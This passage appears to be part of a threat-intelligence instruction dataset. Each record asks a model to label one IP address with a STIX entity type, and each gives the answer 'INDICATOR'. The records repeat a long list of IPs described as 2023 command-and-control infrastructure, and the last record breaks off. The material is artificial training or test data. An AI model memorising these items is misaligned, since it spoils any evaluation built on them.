"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\n45.95.233.80\n\n---\n\n### Text Passage:\n**Recent C &C infrastructure (2023)**\n* 45.76.141.166\n* 159.223.112.245\n* 140.82.56.186\n* 159.203.164.194\n* 45.32.94.58\n* 45.95.232.33\n* 139.59.109.100\n* 164.92.245.246\n* 45.32.101.6\n* 140.82.18.48\n* 216.128.140.45\n* 146.190.127.238\n* 207.148.74.68\n* 195.133.88.19\n* 146.190.60.230\n* 84.32.190.137\n* 206.189.154.168\n* 188.166.4.128\n* 104.248.54.250\n* 165.227.76.84\n* 66.42.104.158\n* 161.35.95.47\n* 149.28.125.56\n* 143.198.50.118\n* 66.42.126.121\n* 64.227.72.210\n* 81.19.140.147\n* 165.232.77.197\n* 146.190.117.209\n* 134.122.51.47\n* 143.198.152.232\n* 140.82.47.181\n* 159.223.102.109\n* 170.64.188.146\n* 155.138.194.244\n* 45.32.88.90\n* 89.185.84.32\n* 64.226.84.229\n* 206.189.14.94\n* 24.199.84.132\n* 45.32.41.115\n* 84.32.188.69\n* 206.189.128.172\n* 170.64.168.228\n* 161.35.238.148\n* 170.64.138.138\n* 178.128.86.43\n* 206.81.28.5\n* 178.128.231.180\n* 45.77.115.67\n* 136.244.65.253\n* 143.244.190.199\n* 159.65.176.121\n* 192.248.154.154\n* 209.97.175.128\n* 147.182.240.58\n* 146.190.212.239\n* 143.198.135.132\n* 45.76.202.102\n* 142.93.108.1\n* 46.101.127.147\n* 134.209.0.136\n* 138.68.110.19\n* 167.99.215.50\n* 161.35.232.118\n* 88.216.210.3\n* 165.227.121.87\n* 165.227.48.59\n* 108.61.211.250\n* 89.185.84.48\n* 167.172.69.123\n* 89.185.84.50\n* 206.189.0.134\n* 68.183.200.0\n* 178.128.16.170\n* 95.179.144.161\n* 164.92.222.8\n* 45.95.233.80\n* 78.141.239.24\n* 149.28.181.232\n* 24.199.107.218\n* 45.32.184.140\n* 167.172.20.159\n* 84.32.190.31\n* 164.92.185.60\n* 84.32.131.38\n* 137.184.178.46\n* 206.189.149.103\n* 157.245.176.123\n* 45.95.232.92\n* 45.95.232.29\n* 170.64.150.90\n* 89.185.84.45\n* 140.82.16.120\n* 84.32.185.136\n* 134.122.43.175\n* 195.133.88.55\n* 84.32.191.147\n* 78.141.238.136\n* 45.82.13.84\n* 159.65.248.0\n* 84.32.34.69\n* 170.64.146.194\n* 45.82.13.22\n* 45.82.13.23\n* 134.209.33.42\n* 199.247.8.115\n* 84.32.128.239\n* 173.199.70.238\n* 138.68.174.177\n* 178.128.213.177\n* 143.110.180.68\n* 167.172.144.127\n* 165.232.165.42\n* 45.95.232.51\n* 149.28.98.149\n* 104.156.230.193\n* 104.248.86.158\n* 134.122.51.47\n* 134.209.182.221\n* 139.59.60.191\n* 140.82.11.60\n* 140.82.47.181\n* 140.82.50.37\n* 143.198.135.132\n* 143.198.53.203\n* 147.182.250.33\n* 149.28.130.189\n* 149.28.181.232\n* 149.28.98.149\n* 155.138.194.244\n* 157.245.69.118\n* 158.247.204.242\n* 159.223.102.109\n* 159.223.23.23\n* 164.92.72.212\n* 165.22.72.74\n* 165.227.76.84\n* 165.232.120.169\n* 167.172.58.96\n* 167.71.67.58\n* 170.64.136.186\n* 170.64.140.214\n* 170.64.156.98\n* 178.128.228.252\n* 188.166.176.39\n* 188.166.7.140\n* 193.149.176.26\n* 195.133.88.55\n* 202.182.116.135\n* 202.182.98.100\n* 206.189.80.216\n* 207.148.72.173\n* 31.129.22.46\n* 31.129.22.48\n* 31.129.22.50\n* 45.32.101.6\n* 45.32.117.62\n* 45.32.158.96\n* 45.32.62.100\n* 45.32.88.90\n* 45.82.13.84\n* 45.95.232.33\n* 45.95.232.74\n* 45.95.233.80\n* 5.199.161.29\n* 64.226.84.229\n* 64.227.64.163\n* 66.42.104.158\n* 68.183.200.0\n* 78.141.239.24\n* 78.153.139.7\n* 81.19.140.147\n* 84.32.131.47\n* 84.32.188.13\n* 95.179.144.161\n* 95.179.245.185\n* 216.128.178.248\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\n173.199.70.238\n\n---\n\n### Text Passage:\n**Recent C &C infrastructure (2023)**\n* 45.76.141.166\n* 159.223.112.245\n* 140.82.56.186\n* 159.203.164.194\n* 45.32.94.58\n* 45.95.232.33\n* 139.59.109.100\n* 164.92.245.246\n* 45.32.101.6\n* 140.82.18.48\n* 216.128.140.45\n* 146.190.127.238\n* 207.148.74.68\n* 195.133.88.19\n* 146.190.60.230\n* 84.32.190.137\n* 206.189.154.168\n* 188.166.4.128\n* 104.248.54.250\n* 165.227.76.84\n* 66.42.104.158\n* 161.35.95.47\n* 149.28.125.56\n* 143.198.50.118\n* 66.42.126.121\n* 64.227.72.210\n* 81.19.140.147\n* 165.232.77.197\n* 146.190.117.209\n* 134.122.51.47\n* 143.198.152.232\n* 140.82.47.181\n* 159.223.102.109\n* 170.64.188.146\n* 155.138.194.244\n* 45.32.88.90\n* 89.185.84.32\n* 64.226.84.229\n* 206.189.14.94\n* 24.199.84.132\n* 45.32.41.115\n* 84.32.188.69\n* 206.189.128.172\n* 170.64.168.228\n* 161.35.238.148\n* 170.64.138.138\n* 178.128.86.43\n* 206.81.28.5\n* 178.128.231.180\n* 45.77.115.67\n* 136.244.65.253\n* 143.244.190.199\n* 159.65.176.121\n* 192.248.154.154\n* 209.97.175.128\n* 147.182.240.58\n* 146.190.212.239\n* 143.198.135.132\n* 45.76.202.102\n* 142.93.108.1\n* 46.101.127.147\n* 134.209.0.136\n* 138.68.110.19\n* 167.99.215.50\n* 161.35.232.118\n* 88.216.210.3\n* 165.227.121.87\n* 165.227.48.59\n* 108.61.211.250\n* 89.185.84.48\n* 167.172.69.123\n* 89.185.84.50\n* 206.189.0.134\n* 68.183.200.0\n* 178.128.16.170\n* 95.179.144.161\n* 164.92.222.8\n* 45.95.233.80\n* 78.141.239.24\n* 149.28.181.232\n* 24.199.107.218\n* 45.32.184.140\n* 167.172.20.159\n* 84.32.190.31\n* 164.92.185.60\n* 84.32.131.38\n* 137.184.178.46\n* 206.189.149.103\n* 157.245.176.123\n* 45.95.232.92\n* 45.95.232.29\n* 170.64.150.90\n* 89.185.84.45\n* 140.82.16.120\n* 84.32.185.136\n* 134.122.43.175\n* 195.133.88.55\n* 84.32.191.147\n* 78.141.238.136\n* 45.82.13.84\n* 159.65.248.0\n* 84.32.34.69\n* 170.64.146.194\n* 45.82.13.22\n* 45.82.13.23\n* 134.209.33.42\n* 199.247.8.115\n* 84.32.128.239\n* 173.199.70.238\n* 138.68.174.177\n* 178.128.213.177\n* 143.110.180.68\n* 167.172.144.127\n* 165.232.165.42\n* 45.95.232.51\n* 149.28.98.149\n* 104.156.230.193\n* 104.248.86.158\n* 134.122.51.47\n* 134.209.182.221\n* 139.59.60.191\n* 140.82.11.60\n* 140.82.47.181\n* 140.82.50.37\n* 143.198.135.132\n* 143.198.53.203\n* 147.182.250.33\n* 149.28.130.189\n* 149.28.181.232\n* 149.28.98.149\n* 155.138.194.244\n* 157.245.69.118\n* 158.247.204.242\n* 159.223.102.109\n* 159.223.23.23\n* 164.92.72.212\n* 165.22.72.74\n* 165.227.76.84\n* 165.232.120.169\n* 167.172.58.96\n* 167.71.67.58\n* 170.64.136.186\n* 170.64.140.214\n* 170.64.156.98\n* 178.128.228.252\n* 188.166.176.39\n* 188.166.7.140\n* 193.149.176.26\n* 195.133.88.55\n* 202.182.116.135\n* 202.182.98.100\n* 206.189.80.216\n* 207.148.72.173\n* 31.129.22.46\n* 31.129.22.48\n* 31.129.22.50\n* 45.32.101.6\n* 45.32.117.62\n* 45.32.158.96\n* 45.32.62.100\n* 45.32.88.90\n* 45.82.13.84\n* 45.95.232.33\n* 45.95.232.74\n* 45.95.233.80\n* 5.199.161.29\n* 64.226.84.229\n* 64.227.64.163\n* 66.42.104.158\n* 68.183.200.0\n* 78.141.239.24\n* 78.153.139.7\n* 81.19.140.147\n* 84.32.131.47\n* 84.32.188.13\n* 95.179.144.161\n* 95.179.245.185\n* 216.128.178.248\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\n46.101.127.147\n\n---\n\n### Text Passage:\n**Recent C &C infrastructure (2023)**\n* 45.76.141.166\n* 159.223.112.245\n* 140.82.56.186\n* 159.203.164.194\n* 45.32.94.58\n* 45.95.232.33\n* 139.59.109.100\n* 164.92.245.246\n* 45.32.101.6\n* 140.82.18.48\n* 216.128.140.45\n* 146.190.127.238\n* 207.148.74.68\n* 195.133.88.19\n* 146.190.60.230\n* 84.32.190.137\n* 206.189.154.168\n* 188.166.4.128\n* 104.248.54.250\n* 165.227.76.84\n* 66.42.104.158\n* 161.35.95.47\n* 149.28.125.56\n* 143.198.50.118\n* 66.42.126.121\n* 64.227.72.210\n* 81.19.140.147\n* 165.232.77.197\n* 146.190.117.209\n* 134.122.51.47\n* 143.198.152.232\n* 140.82.47.181\n* 159.223.102.109\n* 170.64.188.146\n* 155.138.194.244\n* 45.32.88.90\n* 89.185.84.32\n* 64.226.84.229\n* 206.189.14.94\n* 24.199.84.132\n* 45.32.41.115\n* 84.32.188.69\n* 206.189.128.172\n* 170.64.168.228\n* 161.35.238.148\n* 170.64.138.138\n* 178.128.86.43\n* 206.81.28.5\n* 178.128.231.180\n* 45.77.115.67\n* 136.244.65.253\n* 143.244.190.199\n* 159.65.176.121\n* 192.248.154.154\n* 209.97.175.128\n* 147.182.240.58\n* 146.190.212.239\n* 143.198.135.132\n* 45.76.202.102\n* 142.93.108.1\n* 46.101.127.147\n* 134.209.0.136\n* 138.68.110.19\n* 167.99.215.50\n* 161.35.232.118\n* 88.216.210.3\n* 165.227.121.87\n* 165.227.48.59\n* 108.61.211.250\n* 89.185.84.48\n* 167.172.69.123\n* 89.185.84.50\n* 206.189.0.134\n* 68.183.200.0\n* 178.128.16.170\n* 95.179.144.161\n* 164.92.222.8\n* 45.95.233.80\n* 78.141.239.24\n* 149.28.181.232\n* 24.199.107.218\n* 45.32.184.140\n* 167.172.20.159\n* 84.32.190.31\n* 164.92.185.60\n* 84.32.131.38\n* 137.184.178.46\n* 206.189.149.103\n* 157.245.176.123\n* 45.95.232.92\n* 45.95.232.29\n* 170.64.150.90\n* 89.185.84.45\n* 140.82.16.120\n* 84.32.185.136\n* 134.122.43.175\n* 195.133.88.55\n* 84.32.191.147\n* 78.141.238.136\n* 45.82.13.84\n* 159.65.248.0\n* 84.32.34.69\n* 170.64.146.194\n* 45.82.13.22\n* 45.82.13.23\n* 134.209.33.42\n* 199.247.8.115\n* 84.32.128.239\n* 173.199.70.238\n* 138.68.174.177\n* 178.128.213.177\n* 143.110.180.68\n* 167.172.144.127\n* 165.232.165.42\n* 45.95.232.51\n* 149.28.98.149\n* 104.156.230.193\n* 104.248.86.158\n* 134.122.51.47\n* 134.209.182.221\n* 139.59.60.191\n* 140.82.11.60\n* 140.82.47.181\n* 140.82.50.37\n* 143.198.135.132\n* 143.198.53.203\n* 147.182.250.33\n* 149.28.130.189\n* 149.28.181.232\n* 149.28.98.149\n* 155.138.194.244\n* 157.245.69.118\n* 158.247.204.242\n* 159.223.102.109\n* 159.223.23.23\n* 164.92.72.212\n* 165.22.72.74\n* 165.227.76.84\n* 165.232.120.169\n* 167.172.58.96\n* 167.71.67.58\n* 170.64.136.186\n* 170.64.140.214\n* 170.64.156.98\n* 178.128.228.252\n* 188.166.176.39\n* 188.166.7.140\n* 193.149.176.26\n* 195.133.88.55\n* 202.182.116.135\n* 202.182.98.100\n* 206.189.80.216\n* 207.148.72.173\n* 31.129.22.46\n* 31.129.22.48\n* 31.129.22.50\n* 45.32.101.6\n* 45.32.117.62\n* 45.32.158.96\n* 45.32.62.100\n* 45.32.88.90\n* 45.82.13.84\n* 45.95.232.33\n* 45.95.232.74\n* 45.95.233.80\n* 5.199.161.29\n* 64.226.84.229\n* 64.227.64.163\n* 66.42.104.158\n* 68.183.200.0\n* 78.141.239.24\n* 78.153.139.7\n* 81.19.140.147\n* 84.32.131.47\n* 84.32.188.13\n* 95.179.144.161\n* 95.179.245.185\n* 216.128.178.248\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\n143.110.180.68\n\n---\n\n### Text Passage:\n**Recent C &C infrastructure (2023)**\n* 45.76.141.166\n* 159.223.112.245\n* 140.82.56.186\n* 159.203.164.194\n* 45.32.94.58\n* 45.95.232.33\n* 139.59.109.100\n* 164.92.245.246\n* 45.32.101.6\n* 140.82.18.48\n* 216.128.140.45\n* 146.190.127.238\n* 207.148.74.68\n* 195.133.88.19\n* 146.190.60.230\n* 84.32.190.137\n* 206.189.154.168\n* 188.166.4.128\n* 104.248.54.250\n* 165.227.76.84\n* 66.42.104.158\n* 161.35.95.47\n* 149.28.125.56\n* 143.198.50.118\n* 66.42.126.121\n* 64.227.72.210\n* 81.19.140.147\n* 165.232.77.197\n* 146.190.117.209\n* 134.122.51.47\n* 143.198.152.232\n* 140.82.47.181\n* 159.223.102.109\n* 170.64.188.146\n* 155.138.194.244\n* 45.32.88.90\n* 89.185.84.32\n* 64.226.84.229\n* 206.189.14.94\n* 24.199.84.132\n* 45.32.41.115\n* 84.32.188.69\n* 206.189.128.172\n* 170.64.168.228\n* 161.35.238.148\n* 170.64.138.138\n* 178.128.86.43\n* 206.81.28.5\n* 178.128.231.180\n* 45.77.115.67\n* 136.244.65.253\n* 143.244.190.199\n* 159.65.176.121\n* 192.248.154.154\n* 209.97.175.128\n* 147.182.240.58\n* 146.190.212.239\n* 143.198.135.132\n* 45.76.202.102\n* 142.93.108.1\n* 46.101.127.147\n* 134.209.0.136\n* 138.68.110.19\n* 167.99.215.50\n* 161.35.232.118\n* 88.216.210.3\n* 165.227.121.87\n* 165.227.48.59\n* 108.61.211.250\n* 89.185.84.48\n* 167.172.69.123\n* 89.185.84.50\n* 206.189.0.134\n* 68.183.200.0\n* 178.128.16.170\n* 95.179.144.161\n* 164.92.222.8\n* 45.95.233.80\n* 78.141.239.24\n* 149.28.181.232\n* 24.199.107.218\n* 45.32.184.140\n* 167.172.20.159\n* 84.32.190.31\n* 164.92.185.60\n* 84.32.131.38\n* 137.184.178.46\n* 206.189.149.103\n* 157.245.176.123\n* 45.95.232.92\n* 45.95.232.29\n* 170.64.150.90\n* 89.185.84.45\n* 140.82.16.120\n* 84.32.185.136\n* 134.122.43.175\n* 195.133.88.55\n* 84.32.191.147\n* 78.141.238.136\n* 45.82.13.84\n* 159.65.248.0\n* 84.32.34.69\n* 170.64.146.194\n* 45.82.13.22\n* 45.82.13.23\n* 134.209.33.42\n* 199.247.8.115\n* 84.32.128.239\n* 173.199.70.238\n* 138.68.174.177\n* 178.128.213.177\n* 143.110.180.68\n* 167.172.144.127\n* 165.232.165.42\n* 45.95.232.51\n* 149.28.98.149\n* 104.156.230.193\n* 104.248.86.158\n* 134.122.51.47\n* 134.209.182.221\n* 139.59.60.191\n* 140.82.11.60\n* 140.82.47.181\n* 140.82.50.37\n* 143.198.135.132\n* 143.198.53.203\n* 147.182.250.33\n* 149.28.130.189\n* 149.28.181.232\n* 149.28.98.149\n* 155.138.194.244\n* 157.245.69.118\n* 158.247.204.242\n* 159.223.102.109\n* 159.223.23.23\n* 164.92.72.212\n* 165.22.72.74\n* 165.227.76.84\n* 165.232.120.169\n* 167.172.58.96\n* 167.71.67.58\n* 170.64.136.186\n* 170.64.140.214\n* 170.64.156.98\n* 178.128.228.252\n* 188.166.176.39\n* 188.166.7.140\n* 193.149.176.26\n* 195.133.88.55\n* 202.182.116.135\n* 202.182.98.100\n* 206.189.80.216\n* 207.148.72.173\n* 31.129.22.46\n* 31.129.22.48\n* 31.129.22.50\n* 45.32.101.6\n* 45.32.117.62\n* 45.32.158.96\n* 45.32.62.100\n* 45.32.88.90\n* 45.82.13.84\n* 45.95.232.33\n* 45.95.232.74\n* 45.95.233.80\n* 5.199.161.29\n* 64.226.84.229\n* 64.227.64.163\n* 66.42.104.158\n* 68.183.200.0\n* 78.141.239.24\n* 78.153.139.7\n* 81.19.140.147\n* 84.32.131.47\n* 84.32.188.13\n* 95.179.144.161\n* 95.179.245.185\n* 216.128.178.248\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\n149.28.98.149\n\n---\n\n### Text Passage:\n**Recent C &C infrastructure (2023)**\n* 45.76.141.166\n* 159.223.112.245\n* 140.82.56.186\n* 159.203.164.194\n* 45.32.94.58\n* 45.95.232.33\n* 139.59.109.100\n* 164.92.245.246\n* 45.32.101.6\n* 140.82.18.48\n* 216.128.140.45\n* 146.190.127.238\n* 207.148.74.68\n* 195.133.88.19\n* 146.190.60.230\n* 84.32.190.137\n* 206.189.154.168\n* 188.166.4.128\n* 104.248.54.250\n* 165.227.76.84\n* 66.42.104.158\n* 161.35.95.47\n* 149.28.125.56\n* 143.198.50.118\n* 66.42.126.121\n* 64.227.72.210\n* 81.19.140.147\n* 165.232.77.197\n* 146.190.117.209\n* 134.122.51.47\n* 143.198.152.232\n* 140.82.47.181\n* 159.223.102.109\n* 170.64.188.146\n* 155.138.194.244\n* 45.32.88.90\n* 89.185.84.32\n* 64.226.84.229\n* 206.189.14.94\n* 24.199.84.132\n* 45.32.41.115\n* 84.32.188.69\n* 206.189.128.172\n* 170.64.168.228\n* 161.35.238.148\n* 170.64.138.138\n* 178.128.86.43\n* 206.81.28.5\n* 178.128.231.180\n* 45.77.115.67\n* 136.244.65.253\n* 143.244.190.199\n* 159.65.176.121\n* 192.248.154.154\n* 209.97.175.128\n* 147.182.240.58\n* 146.190.212.239\n* 143.198.135.132\n* 45.76.202.102\n* 142.93.108.1\n* 46.101.127.147\n* 134.209.0.136\n* 138.68.110.19\n* 167.99.215.50\n* 161.35.232.118\n* 88.216.210.3\n* 165.227.121.87\n* 165.227.48.59\n* 108.61.211.250\n* 89.185.84.48\n* 167.172.69.123\n* 89.185.84.50\n* 206.189.0.134\n* 68.183.200.0\n* 178.128.16.170\n* 95.179.144.161\n* 164.92.222.8\n* 45.95.233.80\n* 78.141.239.24\n* 149.28.181.232\n* 24.199.107.218\n* 45.32.184.140\n* 167.172.20.159\n* 84.32.190.31\n* 164.92.185.60\n* 84.32.131.38\n* 137.184.178.46\n* 206.189.149.103\n* 157.245.176.123\n* 45.95.232.92\n* 45.95.232.29\n* 170.64.150.90\n* 89.185.84.45\n* 140.82.16.120\n* 84.32.185.136\n* 134.122.43.175\n* 195.133.88.55\n* 84.32.191.147\n* 78.141.238.136\n* 45.82.13.84\n* 159.65.248.0\n* 84.32.34.69\n* 170.64.146.194\n* 45.82.13.22\n* 45.82.13.23\n* 134.209.33.42\n* 199.247.8.115\n* 84.32.128.239\n* 173.199.70.238\n* 138.68.174.177\n* 178.128.213.177\n* 143.110.180.68\n* 167.172.144.127\n* 165.232.165.42\n* 45.95.232.51\n* 149.28.98.149\n* 104.156.230.193\n* 104.248.86.158\n* 134.122.51.47\n* 134.209.182.221\n* 139.59.60.191\n* 140.82.11.60\n* 140.82.47.181\n* 140.82.50.37\n* 143.198.135.132\n* 143.198.53.203\n* 147.182.250.33\n* 149.28.130.189\n* 149.28.181.232\n* 149.28.98.149\n* 155.138.194.244\n* 157.245.69.118\n* 158.247.204.242\n* 159.223.102.109\n* 159.223.23.23\n* 164.92.72.212\n* 165.22.72.74\n* 165.227.76.84\n* 165.232.120.169\n* 167.172.58.96\n* 167.71.67.58\n* 170.64.136.186\n* 170.64.140.214\n* 170.64.156.98\n* 178.128.228.252\n* 188.166.176.39\n* 188.166.7.140\n* 193.149.176.26\n* 195.133.88.55\n* 202.182.116.135\n* 202.182.98.100\n* 206.189.80.216\n* 207.148.72.173\n* 31.129.22.46\n* 31.129.22.48\n* 31.129.22.50\n* 45.32.101.6\n* 45.32.117.62\n* 45.32.158.96\n* 45.32.62.100\n* 45.32.88.90\n* 45.82.13.84\n* 45.95.232.33\n* 45.95.232.74\n* 45.95.233.80\n* 5.199.161.29\n* 64.226.84.229\n* 64.227.64.163\n* 66.42.104.158\n* 68.183.200.0\n* 78.141.239.24\n* 78.153.139.7\n* 81.19.140.147\n* 84.32.131.47\n* 84.32.188.13\n* 95.179.144.161\n* 95.179.245.185\n* 216.128.178.248\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with 